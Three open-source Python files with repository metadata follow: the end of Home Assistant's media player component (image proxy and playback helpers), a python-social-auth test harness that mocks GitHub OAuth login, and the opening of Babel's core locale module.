await self.hass.async_add_job(self.set_shuffle, shuffle)
# No need to overwrite these.
@property
def support_play(self):
"""Boolean if play is supported."""
return bool(self.supported_features & SUPPORT_PLAY)
@property
def support_pause(self):
"""Boolean if pause is supported."""
return bool(self.supported_features & SUPPORT_PAUSE)
@property
def support_stop(self):
"""Boolean if stop is supported."""
return bool(self.supported_features & SUPPORT_STOP)
@property
def support_seek(self):
"""Boolean if seek is supported."""
return bool(self.supported_features & SUPPORT_SEEK)
@property
def support_volume_set(self):
"""Boolean if setting volume is supported."""
return bool(self.supported_features & SUPPORT_VOLUME_SET)
@property
def support_volume_mute(self):
"""Boolean if muting volume is supported."""
return bool(self.supported_features & SUPPORT_VOLUME_MUTE)
@property
def support_previous_track(self):
"""Boolean if previous track command supported."""
return bool(self.supported_features & SUPPORT_PREVIOUS_TRACK)
@property
def support_next_track(self):
"""Boolean if next track command supported."""
return bool(self.supported_features & SUPPORT_NEXT_TRACK)
@property
def support_play_media(self):
"""Boolean if play media command supported."""
return bool(self.supported_features & SUPPORT_PLAY_MEDIA)
@property
def support_select_source(self):
"""Boolean if select source command supported."""
return bool(self.supported_features & SUPPORT_SELECT_SOURCE)
@property
def support_select_sound_mode(self):
"""Boolean if select sound mode command supported."""
return bool(self.supported_features & SUPPORT_SELECT_SOUND_MODE)
@property
def support_clear_playlist(self):
"""Boolean if clear playlist command supported."""
return bool(self.supported_features & SUPPORT_CLEAR_PLAYLIST)
@property
def support_shuffle_set(self):
"""Boolean if shuffle is supported."""
return bool(self.supported_features & SUPPORT_SHUFFLE_SET)
async def async_toggle(self):
"""Toggle the power on the media player."""
if hasattr(self, "toggle"):
# pylint: disable=no-member
await self.hass.async_add_job(self.toggle)
return
if self.state in [STATE_OFF, STATE_IDLE]:
await self.async_turn_on()
else:
await self.async_turn_off()
async def async_volume_up(self):
"""Turn volume up for media player.
This method is a coroutine.
"""
if hasattr(self, "volume_up"):
# pylint: disable=no-member
await self.hass.async_add_job(self.volume_up)
return
if self.volume_level < 1 and self.supported_features & SUPPORT_VOLUME_SET:
await self.async_set_volume_level(min(1, self.volume_level + 0.1))
async def async_volume_down(self):
"""Turn volume down for media player.
This method is a coroutine.
"""
if hasattr(self, "volume_down"):
# pylint: disable=no-member
await self.hass.async_add_job(self.volume_down)
return
if self.volume_level > 0 and self.supported_features & SUPPORT_VOLUME_SET:
await self.async_set_volume_level(max(0, self.volume_level - 0.1))
async def async_media_play_pause(self):
"""Play or pause the media player."""
if hasattr(self, "media_play_pause"):
# pylint: disable=no-member
await self.hass.async_add_job(self.media_play_pause)
return
if self.state == STATE_PLAYING:
await self.async_media_pause()
else:
await self.async_media_play()
@property
def entity_picture(self):
"""Return image of the media playing."""
if self.state == STATE_OFF:
return None
if self.media_image_remotely_accessible:
return self.media_image_url
image_hash = self.media_image_hash
if image_hash is None:
return None
return ENTITY_IMAGE_URL.format(self.entity_id, self.access_token, image_hash)
@property
def capability_attributes(self):
"""Return capability attributes."""
supported_features = self.supported_features or 0
data = {}
if supported_features & SUPPORT_SELECT_SOURCE:
source_list = self.source_list
if source_list:
data[ATTR_INPUT_SOURCE_LIST] = source_list
if supported_features & SUPPORT_SELECT_SOUND_MODE:
sound_mode_list = self.sound_mode_list
if sound_mode_list:
data[ATTR_SOUND_MODE_LIST] = sound_mode_list
return data
@property
def state_attributes(self):
"""Return the state attributes."""
if self.state == STATE_OFF:
return None
state_attr = {
attr: getattr(self, attr)
for attr in ATTR_TO_PROPERTY
if getattr(self, attr) is not None
}
return state_attr
async def _async_fetch_image(hass, url):
"""Fetch image.
Images are cached in memory (the images are typically 10-100kB in size).
"""
cache_images = ENTITY_IMAGE_CACHE[CACHE_IMAGES]
cache_maxsize = ENTITY_IMAGE_CACHE[CACHE_MAXSIZE]
if urlparse(url).hostname is None:
url = hass.config.api.base_url + url
if url not in cache_images:
cache_images[url] = {CACHE_LOCK: asyncio.Lock()}
async with cache_images[url][CACHE_LOCK]:
if CACHE_CONTENT in cache_images[url]:
return cache_images[url][CACHE_CONTENT]
content, content_type = (None, None)
websession = async_get_clientsession(hass)
try:
with async_timeout.timeout(10):
response = await websession.get(url)
if response.status == 200:
content = await response.read()
content_type = response.headers.get(CONTENT_TYPE)
if content_type:
content_type = content_type.split(";")[0]
cache_images[url][CACHE_CONTENT] = content, content_type
except asyncio.TimeoutError:
pass
while len(cache_images) > cache_maxsize:
cache_images.popitem(last=False)
return content, content_type
class MediaPlayerImageView(HomeAssistantView):
"""Media player view to serve an image."""
requires_auth = False
url = "/api/media_player_proxy/{entity_id}"
name = "api:media_player:image"
def __init__(self, component):
"""Initialize a media player view."""
self.component = component
async def get(self, request, entity_id):
"""Start a get request."""
player = self.component.get_entity(entity_id)
if player is None:
status = 404 if request[KEY_AUTHENTICATED] else 401
return web.Response(status=status)
authenticated = (
request[KEY_AUTHENTICATED]
or request.query.get("token") == player.access_token
)
if not authenticated:
return web.Response(status=401)
if player.media_image_remotely_accessible:
url = player.media_image_url
if url is not None:
return web.Response(status=302, headers={"location": url})
return web.Response(status=500)
data, content_type = await player.async_get_media_image()
if data is None:
return web.Response(status=500)
headers = {CACHE_CONTROL: "max-age=3600"}
return web.Response(body=data, content_type=content_type, headers=headers)
@websocket_api.async_response
async def websocket_handle_thumbnail(hass, connection, msg):
"""Handle get media player cover command.
Async friendly.
"""
component = hass.data[DOMAIN]
player = component.get_entity(msg["entity_id"])
if player is None:
connection.send_message(
websocket_api.error_message(
msg["id"], "entity_not_found", "Entity not found"
)
)
return
data, content_type = await player.async_get_media_image()
if data is None:
connection.send_message(
websocket_api.error_message(
msg["id"], "thumbnail_fetch_failed", "Failed to fetch thumbnail"
)
)
return
await connection.send_big_result(
msg["id"],
{
"content_type": content_type,
"content": base64.b64encode(data).decode("utf-8"),
},
)
| {
"content_hash": "20d0bd60832b2dd84225569379134859",
"timestamp": "",
"source": "github",
"line_count": 914,
"max_line_length": 85,
"avg_line_length": 29.200218818380744,
"alnum_prop": 0.6193562891078721,
"repo_name": "postlund/home-assistant",
"id": "8a31dbe6bdb611443580ca611a0ee910d539744f",
"size": "26689",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/media_player/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20215859"
},
{
"name": "Shell",
"bytes": "6663"
}
],
"symlink_target": ""
} |
import json
import requests
import unittest
from sure import expect
from httpretty import HTTPretty
from social.utils import parse_qs, module_member
from social.p3 import urlparse
from social.actions import do_auth, do_complete
from social.tests.models import TestStorage, User, TestUserSocialAuth, \
TestNonce, TestAssociation
from social.tests.strategy import TestStrategy
class BaseActionTest(unittest.TestCase):
user_data_url = 'https://api.github.com/user'
login_redirect_url = '/success'
expected_username = 'foobar'
access_token_body = json.dumps({
'access_token': 'foobar',
'token_type': 'bearer'
})
user_data_body = json.dumps({
'login': 'foobar',
'id': 1,
'avatar_url': 'https://github.com/images/error/foobar_happy.gif',
'gravatar_id': 'somehexcode',
'url': 'https://api.github.com/users/foobar',
'name': 'monalisa foobar',
'company': 'GitHub',
'blog': 'https://github.com/blog',
'location': 'San Francisco',
'email': 'foo@bar.com',
'hireable': False,
'bio': 'There once was...',
'public_repos': 2,
'public_gists': 1,
'followers': 20,
'following': 0,
'html_url': 'https://github.com/foobar',
'created_at': '2008-01-14T04:33:35Z',
'type': 'User',
'total_private_repos': 100,
'owned_private_repos': 100,
'private_gists': 81,
'disk_usage': 10000,
'collaborators': 8,
'plan': {
'name': 'Medium',
'space': 400,
'collaborators': 10,
'private_repos': 20
}
})
def setUp(self):
HTTPretty.enable()
User.reset_cache()
TestUserSocialAuth.reset_cache()
TestNonce.reset_cache()
TestAssociation.reset_cache()
self.backend = module_member('social.backends.github.GithubOAuth2')
self.strategy = TestStrategy(self.backend, TestStorage)
self.user = None
def tearDown(self):
self.backend = None
self.strategy = None
self.user = None
User.reset_cache()
User.set_active(True)
TestUserSocialAuth.reset_cache()
TestNonce.reset_cache()
TestAssociation.reset_cache()
HTTPretty.disable()
def do_login(self, after_complete_checks=True, user_data_body=None,
expected_username=None):
self.strategy.set_settings({
'SOCIAL_AUTH_GITHUB_KEY': 'a-key',
'SOCIAL_AUTH_GITHUB_SECRET': 'a-secret-key',
'SOCIAL_AUTH_LOGIN_REDIRECT_URL': self.login_redirect_url,
'SOCIAL_AUTH_AUTHENTICATION_BACKENDS': (
'social.backends.github.GithubOAuth2',
)
})
start_url = do_auth(self.strategy).url
target_url = self.strategy.build_absolute_uri(
'/complete/github/?code=foobar'
)
start_query = parse_qs(urlparse(start_url).query)
location_url = target_url + ('?' in target_url and '&' or '?') + \
'state=' + start_query['state']
location_query = parse_qs(urlparse(location_url).query)
HTTPretty.register_uri(HTTPretty.GET, start_url, status=301,
location=location_url)
HTTPretty.register_uri(HTTPretty.GET, location_url, status=200,
body='foobar')
response = requests.get(start_url)
expect(response.url).to.equal(location_url)
expect(response.text).to.equal('foobar')
HTTPretty.register_uri(HTTPretty.GET,
uri=self.backend.ACCESS_TOKEN_URL,
status=200,
body=self.access_token_body or '',
content_type='text/json')
if self.user_data_url:
user_data_body = user_data_body or self.user_data_body or ''
HTTPretty.register_uri(HTTPretty.GET, self.user_data_url,
body=user_data_body,
content_type='text/json')
self.strategy.set_request_data(location_query)
redirect = do_complete(
self.strategy,
user=self.user,
login=lambda strategy, user: strategy.session_set('username',
user.username)
)
if after_complete_checks:
expect(self.strategy.session_get('username')).to.equal(
expected_username or self.expected_username
)
expect(redirect.url).to.equal(self.login_redirect_url)
return redirect
def do_login_with_partial_pipeline(self, before_complete=None):
self.strategy.set_settings({
'SOCIAL_AUTH_GITHUB_KEY': 'a-key',
'SOCIAL_AUTH_GITHUB_SECRET': 'a-secret-key',
'SOCIAL_AUTH_LOGIN_REDIRECT_URL': self.login_redirect_url,
'SOCIAL_AUTH_AUTHENTICATION_BACKENDS': (
'social.backends.github.GithubOAuth2',
),
'SOCIAL_AUTH_PIPELINE': (
'social.pipeline.social_auth.social_details',
'social.pipeline.social_auth.social_uid',
'social.pipeline.social_auth.auth_allowed',
'social.pipeline.partial.save_status_to_session',
'social.tests.pipeline.ask_for_password',
'social.pipeline.social_auth.social_user',
'social.pipeline.user.get_username',
'social.pipeline.user.create_user',
'social.pipeline.social_auth.associate_user',
'social.pipeline.social_auth.load_extra_data',
'social.tests.pipeline.set_password',
'social.pipeline.user.user_details'
)
})
start_url = do_auth(self.strategy).url
target_url = self.strategy.build_absolute_uri(
'/complete/github/?code=foobar'
)
start_query = parse_qs(urlparse(start_url).query)
location_url = target_url + ('?' in target_url and '&' or '?') + \
'state=' + start_query['state']
location_query = parse_qs(urlparse(location_url).query)
HTTPretty.register_uri(HTTPretty.GET, start_url, status=301,
location=location_url)
HTTPretty.register_uri(HTTPretty.GET, location_url, status=200,
body='foobar')
response = requests.get(start_url)
expect(response.url).to.equal(location_url)
expect(response.text).to.equal('foobar')
HTTPretty.register_uri(HTTPretty.GET,
uri=self.backend.ACCESS_TOKEN_URL,
status=200,
body=self.access_token_body or '',
content_type='text/json')
if self.user_data_url:
HTTPretty.register_uri(HTTPretty.GET, self.user_data_url,
body=self.user_data_body or '',
content_type='text/json')
self.strategy.set_request_data(location_query)
def _login(strategy, user):
strategy.session_set('username', user.username)
redirect = do_complete(self.strategy, user=self.user, login=_login)
url = self.strategy.build_absolute_uri('/password')
expect(redirect.url).to.equal(url)
HTTPretty.register_uri(HTTPretty.GET, redirect.url, status=200,
body='foobar')
HTTPretty.register_uri(HTTPretty.POST, redirect.url, status=200)
password = 'foobar'
requests.get(url)
requests.post(url, data={'password': password})
data = parse_qs(HTTPretty.last_request.body)
expect(data['password']).to.equal(password)
self.strategy.session_set('password', data['password'])
if before_complete:
before_complete()
redirect = do_complete(self.strategy, user=self.user, login=_login)
expect(self.strategy.session_get('username')).to.equal(
self.expected_username
)
expect(redirect.url).to.equal(self.login_redirect_url)
| {
"content_hash": "c9a285b66b2f33c2d662500ef04c14e2",
"timestamp": "",
"source": "github",
"line_count": 210,
"max_line_length": 76,
"avg_line_length": 39.680952380952384,
"alnum_prop": 0.5598223928957158,
"repo_name": "nvbn/python-social-auth",
"id": "19b2bdda372c4f6884abb9d841c17eb6caaab868",
"size": "8333",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "social/tests/actions/actions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "54"
},
{
"name": "Python",
"bytes": "451960"
},
{
"name": "Shell",
"bytes": "67"
}
],
"symlink_target": ""
} |
"""
babel.core
~~~~~~~~~~
Core locale representation and locale data access.
:copyright: (c) 2013 by the Babel Team.
:license: BSD, see LICENSE for more details.
"""
import os
from babel import localedata
from babel._compat import pickle, string_types
from babel.plural import PluralRule
__all__ = ['UnknownLocaleError', 'Locale', 'default_locale', 'negotiate_locale',
'parse_locale']
_global_data = None
_default_plural_rule = PluralRule({})
def _raise_no_data_error():
raise RuntimeError('The babel data files are not available. '
'This usually happens because you are using '
'a source checkout from Babel and you did '
'not build the data files. Just make sure '
'to run "python setup.py import_cldr" before '
'installing the library.')
def get_global(key):
"""Return the dictionary for the given key in the global data.
The global data is stored in the ``babel/global.dat`` file and contains
information independent of individual locales.
>>> get_global('zone_aliases')['UTC']
u'Etc/GMT'
>>> get_global('zone_territories')['Europe/Berlin']
u'DE'
The keys available are:
- ``currency_fractions``
- ``language_aliases``
- ``likely_subtags``
- ``parent_exceptions``
- ``script_aliases``
- ``territory_aliases``
- ``territory_currencies``
- ``territory_languages``
- ``territory_zones``
- ``variant_aliases``
- ``windows_zone_mapping``
- ``zone_aliases``
- ``zone_territories``
.. note:: The internal structure of the data may change between versions.
.. versionadded:: 0.9
:param key: the data key
"""
global _global_data
if _global_data is None:
dirname = os.path.join(os.path.dirname(__file__))
filename = os.path.join(dirname, 'global.dat')
if not os.path.isfile(filename):
_raise_no_data_error()
with open(filename, 'rb') as fileobj:
_global_data = pickle.load(fileobj)
return _global_data.get(key, {})
LOCALE_ALIASES = {
'ar': 'ar_SY', 'bg': 'bg_BG', 'bs': 'bs_BA', 'ca': 'ca_ES', 'cs': 'cs_CZ',
'da': 'da_DK', 'de': 'de_DE', 'el': 'el_GR', 'en': 'en_US', 'es': 'es_ES',
'et': 'et_EE', 'fa': 'fa_IR', 'fi': 'fi_FI', 'fr': 'fr_FR', 'gl': 'gl_ES',
'he': 'he_IL', 'hu': 'hu_HU', 'id': 'id_ID', 'is': 'is_IS', 'it': 'it_IT',
'ja': 'ja_JP', 'km': 'km_KH', 'ko': 'ko_KR', 'lt': 'lt_LT', 'lv': 'lv_LV',
'mk': 'mk_MK', 'nl': 'nl_NL', 'nn': 'nn_NO', 'no': 'nb_NO', 'pl': 'pl_PL',
'pt': 'pt_PT', 'ro': 'ro_RO', 'ru': 'ru_RU', 'sk': 'sk_SK', 'sl': 'sl_SI',
'sv': 'sv_SE', 'th': 'th_TH', 'tr': 'tr_TR', 'uk': 'uk_UA'
}
class UnknownLocaleError(Exception):
"""Exception thrown when a locale is requested for which no locale data
is available.
"""
def __init__(self, identifier):
"""Create the exception.
:param identifier: the identifier string of the unsupported locale
"""
Exception.__init__(self, 'unknown locale %r' % identifier)
#: The identifier of the locale that could not be found.
self.identifier = identifier
class Locale(object):
"""Representation of a specific locale.
>>> locale = Locale('en', 'US')
>>> repr(locale)
"Locale('en', territory='US')"
>>> locale.display_name
u'English (United States)'
A `Locale` object can also be instantiated from a raw locale string:
>>> locale = Locale.parse('en-US', sep='-')
>>> repr(locale)
"Locale('en', territory='US')"
`Locale` objects provide access to a collection of locale data, such as
territory and language names, number and date format patterns, and more:
>>> locale.number_symbols['decimal']
u'.'
If a locale is requested for which no locale data is available, an
`UnknownLocaleError` is raised:
>>> Locale.parse('en_XX')
Traceback (most recent call last):
...
UnknownLocaleError: unknown locale 'en_XX'
For more information see :rfc:`3066`.
"""
def __init__(self, language, territory=None, script=None, variant=None):
"""Initialize the locale object from the given identifier components.
>>> locale = Locale('en', 'US')
>>> locale.language
'en'
>>> locale.territory
'US'
:param language: the language code
:param territory: the territory (country or region) code
:param script: the script code
:param variant: the variant code
:raise `UnknownLocaleError`: if no locale data is available for the
requested locale
"""
#: the language code
self.language = language
#: the territory (country or region) code
self.territory = territory
#: the script code
self.script = script
#: the variant code
self.variant = variant
self.__data = None
identifier = str(self)
if not localedata.exists(identifier):
raise UnknownLocaleError(identifier)
@classmethod
def default(cls, category=None, aliases=LOCALE_ALIASES):
"""Return the system default locale for the specified category.
>>> for name in ['LANGUAGE', 'LC_ALL', 'LC_CTYPE', 'LC_MESSAGES']:
... os.environ[name] = ''
>>> os.environ['LANG'] = 'fr_FR.UTF-8'
>>> Locale.default('LC_MESSAGES')
Locale('fr', territory='FR')
The following fallbacks to the variable are always considered:
- ``LANGUAGE``
- ``LC_ALL``
- ``LC_CTYPE``
- ``LANG``
:param category: one of the ``LC_XXX`` environment variable names
:param aliases: a dictionary of aliases for locale identifiers
"""
# XXX: use likely subtag expansion here instead of the
# aliases dictionary.
locale_string = default_locale(category, aliases=aliases)
return cls.parse(locale_string)
@classmethod
def negotiate(cls, preferred, available, sep='_', aliases=LOCALE_ALIASES):
"""Find the best match between available and requested locale strings.
>>> Locale.negotiate(['de_DE', 'en_US'], ['de_DE', 'de_AT'])
Locale('de', territory='DE')
>>> Locale.negotiate(['de_DE', 'en_US'], ['en', 'de'])
Locale('de')
>>> Locale.negotiate(['de_DE', 'de'], ['en_US'])
You can specify the character used in the locale identifiers to separate
the differnet components. This separator is applied to both lists. Also,
case is ignored in the comparison:
>>> Locale.negotiate(['de-DE', 'de'], ['en-us', 'de-de'], sep='-')
Locale('de', territory='DE')
:param preferred: the list of locale identifers preferred by the user
:param available: the list of locale identifiers available
:param aliases: a dictionary of aliases for locale identifiers
"""
identifier = negotiate_locale(preferred, available, sep=sep,
aliases=aliases)
if identifier:
return Locale.parse(identifier, sep=sep)
@classmethod
def parse(cls, identifier, sep='_', resolve_likely_subtags=True):
"""Create a `Locale` instance for the given locale identifier.
>>> l = Locale.parse('de-DE', sep='-')
>>> l.display_name
u'Deutsch (Deutschland)'
If the `identifier` parameter is not a string, but actually a `Locale`
object, that object is returned:
>>> Locale.parse(l)
Locale('de', territory='DE')
This also can perform resolving of likely subtags which it does
by default. This is for instance useful to figure out the most
likely locale for a territory you can use ``'und'`` as the
language tag:
>>> Locale.parse('und_AT')
Locale('de', territory='AT')
:param identifier: the locale identifier string
:param sep: optional component separator
:param resolve_likely_subtags: if this is specified then a locale will
have its likely subtag resolved if the
locale otherwise does not exist. For
instance ``zh_TW`` by itself is not a
locale that exists but Babel can
automatically expand it to the full
form of ``zh_hant_TW``. Note that this
expansion is only taking place if no
locale exists otherwise. For instance
there is a locale ``en`` that can exist
by itself.
:raise `ValueError`: if the string does not appear to be a valid locale
identifier
:raise `UnknownLocaleError`: if no locale data is available for the
requested locale
"""
if identifier is None:
return None
elif isinstance(identifier, Locale):
return identifier
elif not isinstance(identifier, string_types):
raise TypeError('Unexpected value for identifier: %r' % (identifier,))
parts = parse_locale(identifier, sep=sep)
input_id = get_locale_identifier(parts)
def _try_load(parts):
try:
return cls(*parts)
except UnknownLocaleError:
return None
def _try_load_reducing(parts):
# Success on first hit, return it.
locale = _try_load(parts)
if locale is not None:
return locale
# Now try without script and variant
locale = _try_load(parts[:2])
if locale is not None:
return locale
locale = _try_load(parts)
if locale is not None:
return locale
if not resolve_likely_subtags:
raise UnknownLocaleError(input_id)
# From here onwards is some very bad likely subtag resolving. This
# whole logic is not entirely correct but good enough (tm) for the
# time being. This has been added so that zh_TW does not cause
# errors for people when they upgrade. Later we should properly
# implement ICU like fuzzy locale objects and provide a way to
# maximize and minimize locale tags.
language, territory, script, variant = parts
language = get_global('language_aliases').get(language, language)
territory = get_global('territory_aliases').get(territory, (territory,))[0]
script = get_global('script_aliases').get(script, script)
variant = get_global('variant_aliases').get(variant, variant)
if territory == 'ZZ':
territory = None
if script == 'Zzzz':
script = None
parts = language, territory, script, variant
# First match: try the whole identifier
new_id = get_locale_identifier(parts)
likely_subtag = get_global('likely_subtags').get(new_id)
if likely_subtag is not None:
locale = _try_load_reducing(parse_locale(likely_subtag))
if locale is not None:
return locale
# If we did not find anything so far, try again with a
# simplified identifier that is just the language
likely_subtag = get_global('likely_subtags').get(language)
if likely_subtag is not None:
language2, _, script2, variant2 = parse_locale(likely_subtag)
locale = _try_load_reducing((language2, territory, script2, variant2))
if locale is not None:
return locale
raise UnknownLocaleError(input_id)
def __eq__(self, other):
for key in ('language', 'territory', 'script', 'variant'):
if not hasattr(other, key):
return False
return (self.language == other.language) and \
(self.territory == other.territory) and \
(self.script == other.script) and \
(self.variant == other.variant)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.language, self.territory, self.script, self.variant))
def __repr__(self):
parameters = ['']
for key in ('territory', 'script', 'variant'):
value = getattr(self, key)
if value is not None:
parameters.append('%s=%r' % (key, value))
parameter_string = '%r' % self.language + ', '.join(parameters)
return 'Locale(%s)' % parameter_string
def __str__(self):
return get_locale_identifier((self.language, self.territory,
self.script, self.variant))
@property
def _data(self):
if self.__data is None:
self.__data = localedata.LocaleDataDict(localedata.load(str(self)))
return self.__data
def get_display_name(self, locale=None):
"""Return the display name of the locale using the given locale.
The display name will include the language, territory, script, and
variant, if those are specified.
>>> Locale('zh', 'CN', script='Hans').get_display_name('en')
u'Chinese (Simplified, China)'
:param locale: the locale to use
"""
if locale is None:
locale = self
locale = Locale.parse(locale)
retval = locale.languages.get(self.language)
if self.territory or self.script or self.variant:
details = []
if self.script:
details.append(locale.scripts.get(self.script))
if self.territory:
details.append(locale.territories.get(self.territory))
if self.variant:
details.append(locale.variants.get(self.variant))
details = filter(None, details)
if details:
retval += ' (%s)' % u', '.join(details)
return retval
display_name = property(get_display_name, doc="""\
The localized display name of the locale.
>>> Locale('en').display_name
u'English'
>>> Locale('en', 'US').display_name
u'English (United States)'
>>> Locale('sv').display_name
u'svenska'
:type: `unicode`
""")
def get_language_name(self, locale=None):
"""Return the language of this locale in the given locale.
>>> Locale('zh', 'CN', script='Hans').get_language_name('de')
u'Chinesisch'
.. versionadded:: 1.0
:param locale: the locale to use
"""
if locale is None:
locale = self
locale = Locale.parse(locale)
return locale.languages.get(self.language)
language_name = property(get_language_name, doc="""\
The localized language name of the locale.
>>> Locale('en', 'US').language_name
u'English'
""")
def get_territory_name(self, locale=None):
"""Return the territory name in the given locale."""
if locale is None:
locale = self
locale = Locale.parse(locale)
return locale.territories.get(self.territory)
territory_name = property(get_territory_name, doc="""\
The localized territory name of the locale if available.
>>> Locale('de', 'DE').territory_name
u'Deutschland'
""")
def get_script_name(self, locale=None):
"""Return the script name in the given locale."""
if locale is None:
locale = self
locale = Locale.parse(locale)
return locale.scripts.get(self.script)
script_name = property(get_script_name, doc="""\
The localized script name of the locale if available.
>>> Locale('sr', 'ME', script='Latn').script_name
u'latinica'
""")
@property
def english_name(self):
"""The english display name of the locale.
>>> Locale('de').english_name
u'German'
>>> Locale('de', 'DE').english_name
u'German (Germany)'
:type: `unicode`"""
return self.get_display_name(Locale('en'))
# { General Locale Display Names
@property
def languages(self):
"""Mapping of language codes to translated language names.
>>> Locale('de', 'DE').languages['ja']
u'Japanisch'
See `ISO 639 <http://www.loc.gov/standards/iso639-2/>`_ for
more information.
"""
return self._data['languages']
@property
def scripts(self):
"""Mapping of script codes to translated script names.
>>> Locale('en', 'US').scripts['Hira']
u'Hiragana'
See `ISO 15924 <http://www.evertype.com/standards/iso15924/>`_
for more information.
"""
return self._data['scripts']
@property
def territories(self):
"""Mapping of script codes to translated script names.
>>> Locale('es', 'CO').territories['DE']
u'Alemania'
See `ISO 3166 <http://www.iso.org/iso/en/prods-services/iso3166ma/>`_
for more information.
"""
return self._data['territories']
@property
def variants(self):
"""Mapping of script codes to translated script names.
>>> Locale('de', 'DE').variants['1901']
u'Alte deutsche Rechtschreibung'
"""
return self._data['variants']
# { Number Formatting
@property
def currencies(self):
"""Mapping of currency codes to translated currency names. This
only returns the generic form of the currency name, not the count
specific one. If an actual number is requested use the
:func:`babel.numbers.get_currency_name` function.
>>> Locale('en').currencies['COP']
u'Colombian Peso'
>>> Locale('de', 'DE').currencies['COP']
u'Kolumbianischer Peso'
"""
return self._data['currency_names']
@property
def currency_symbols(self):
"""Mapping of currency codes to symbols.
>>> Locale('en', 'US').currency_symbols['USD']
u'$'
>>> Locale('es', 'CO').currency_symbols['USD']
u'US$'
"""
return self._data['currency_symbols']
@property
def number_symbols(self):
"""Symbols used in number formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('fr', 'FR').number_symbols['decimal']
u','
"""
return self._data['number_symbols']
@property
def decimal_formats(self):
"""Locale patterns for decimal number formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').decimal_formats[None]
<NumberPattern u'#,##0.###'>
"""
return self._data['decimal_formats']
@property
def currency_formats(self):
"""Locale patterns for currency number formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').currency_formats['standard']
<NumberPattern u'\\xa4#,##0.00'>
>>> Locale('en', 'US').currency_formats['accounting']
<NumberPattern u'\\xa4#,##0.00;(\\xa4#,##0.00)'>
"""
return self._data['currency_formats']
@property
def percent_formats(self):
"""Locale patterns for percent number formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').percent_formats[None]
<NumberPattern u'#,##0%'>
"""
return self._data['percent_formats']
@property
def scientific_formats(self):
"""Locale patterns for scientific number formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').scientific_formats[None]
<NumberPattern u'#E0'>
"""
return self._data['scientific_formats']
# { Calendar Information and Date Formatting
@property
def periods(self):
"""Locale display names for day periods (AM/PM).
>>> Locale('en', 'US').periods['am']
u'AM'
"""
try:
return self._data['day_periods']['stand-alone']['wide']
except KeyError:
return {}
@property
def day_periods(self):
"""Locale display names for various day periods (not necessarily only AM/PM).
These are not meant to be used without the relevant `day_period_rules`.
"""
return self._data['day_periods']
@property
def day_period_rules(self):
"""Day period rules for the locale. Used by `get_period_id`.
"""
return self._data.get('day_period_rules', {})
@property
def days(self):
"""Locale display names for weekdays.
>>> Locale('de', 'DE').days['format']['wide'][3]
u'Donnerstag'
"""
return self._data['days']
@property
def months(self):
"""Locale display names for months.
>>> Locale('de', 'DE').months['format']['wide'][10]
u'Oktober'
"""
return self._data['months']
@property
def quarters(self):
"""Locale display names for quarters.
>>> Locale('de', 'DE').quarters['format']['wide'][1]
u'1. Quartal'
"""
return self._data['quarters']
@property
def eras(self):
"""Locale display names for eras.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').eras['wide'][1]
u'Anno Domini'
>>> Locale('en', 'US').eras['abbreviated'][0]
u'BC'
"""
return self._data['eras']
@property
def time_zones(self):
"""Locale display names for time zones.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').time_zones['Europe/London']['long']['daylight']
u'British Summer Time'
>>> Locale('en', 'US').time_zones['America/St_Johns']['city']
u'St. John\u2019s'
"""
return self._data['time_zones']
@property
def meta_zones(self):
"""Locale display names for meta time zones.
Meta time zones are basically groups of different Olson time zones that
have the same GMT offset and daylight savings time.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').meta_zones['Europe_Central']['long']['daylight']
u'Central European Summer Time'
.. versionadded:: 0.9
"""
return self._data['meta_zones']
@property
def zone_formats(self):
"""Patterns related to the formatting of time zones.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').zone_formats['fallback']
u'%(1)s (%(0)s)'
>>> Locale('pt', 'BR').zone_formats['region']
u'Hor\\xe1rio %s'
.. versionadded:: 0.9
"""
return self._data['zone_formats']
@property
def first_week_day(self):
"""The first day of a week, with 0 being Monday.
>>> Locale('de', 'DE').first_week_day
0
>>> Locale('en', 'US').first_week_day
6
"""
return self._data['week_data']['first_day']
@property
def weekend_start(self):
"""The day the weekend starts, with 0 being Monday.
>>> Locale('de', 'DE').weekend_start
5
"""
return self._data['week_data']['weekend_start']
@property
def weekend_end(self):
"""The day the weekend ends, with 0 being Monday.
>>> Locale('de', 'DE').weekend_end
6
"""
return self._data['week_data']['weekend_end']
@property
def min_week_days(self):
"""The minimum number of days in a week so that the week is counted as
the first week of a year or month.
>>> Locale('de', 'DE').min_week_days
4
"""
return self._data['week_data']['min_days']
@property
def date_formats(self):
"""Locale patterns for date formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').date_formats['short']
<DateTimePattern u'M/d/yy'>
>>> Locale('fr', 'FR').date_formats['long']
<DateTimePattern u'd MMMM y'>
"""
return self._data['date_formats']
@property
def time_formats(self):
"""Locale patterns for time formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').time_formats['short']
<DateTimePattern u'h:mm a'>
>>> Locale('fr', 'FR').time_formats['long']
<DateTimePattern u'HH:mm:ss z'>
"""
return self._data['time_formats']
@property
def datetime_formats(self):
"""Locale patterns for datetime formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en').datetime_formats['full']
u"{1} 'at' {0}"
>>> Locale('th').datetime_formats['medium']
u'{1} {0}'
"""
return self._data['datetime_formats']
@property
def datetime_skeletons(self):
"""Locale patterns for formatting parts of a datetime.
>>> Locale('en').datetime_skeletons['MEd']
<DateTimePattern u'E, M/d'>
>>> Locale('fr').datetime_skeletons['MEd']
<DateTimePattern u'E dd/MM'>
>>> Locale('fr').datetime_skeletons['H']
<DateTimePattern u"HH 'h'">
"""
return self._data['datetime_skeletons']
@property
def interval_formats(self):
